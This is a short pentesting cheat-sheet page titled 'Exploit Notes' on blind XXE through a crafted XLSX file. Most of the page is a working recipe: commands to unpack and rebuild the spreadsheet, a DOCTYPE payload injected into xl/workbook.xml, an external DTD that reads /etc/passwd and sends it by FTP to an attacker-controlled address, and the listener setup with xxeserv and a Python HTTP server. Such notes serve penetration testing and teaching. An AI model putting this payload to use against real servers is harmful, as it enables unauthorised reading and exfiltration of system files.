Exploit Notes

Blind XXE

Last modified: 2023-03-03

XXE Web

XXE is a type of vulnerability that allows an attacker to inject and execute malicious XML code on a server that parses XML input, without directly receiving any feedback or response from the server.

Inside XLSX File

An XLSX file is a Microsoft Excel spreadsheet.

1. Create a XLSX File

First we need to create a XLSX file using some software such as LibreOffice Calc.

2. Extract the XLSX File

7z -oXXE xxe.xlsx
cd XXE

We should get files such as “.xml”.

3. Add Blind XXE Payload in the XML File.

Insert the following payload into the xl/workbook.xml.
Replace the “10.0.0.1” with your local ip address.

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE cdl [<!ELEMENT cdl ANY ><!ENTITY % asd SYSTEM "http://10.0.0.1/xxe.dtd">%asd;%c;]>
<cdl>&rrr;</cdl>
<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">

4. Rebuild the XLSX File.

cd XXE
7z u ../xxe.xlsx *

5. Create XXE inside a DTD File

Create “xxe.dtd”.
Replace “10.0.0.1” with your local ip address.

<!ENTITY % d SYSTEM "file:///etc/passwd">
<!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://10.0.0.1:2121/%d;'>">

5. Start a local server

Serve the DTD file using xxeserv.

git clone https://github.com/staaldraad/xxeserv.git
cd xxeserv
go mod init xxeftp.go
go build
go run xxeftp.go -o files.log -p 2121 -w -wd public -wp 8000

In another terminal, start a web server in the directory where “xxe.dtd” located.

sudo python3 -m http.server 80

Now upload “xxe.xlsx” file in the website. We should get the content of the desired file.

Tools by HDKS

Fuzzagotchi

Automatic web fuzzer.

aut0rec0n

Auto reconnaissance CLI.

Hash Cracker

Hash identifier.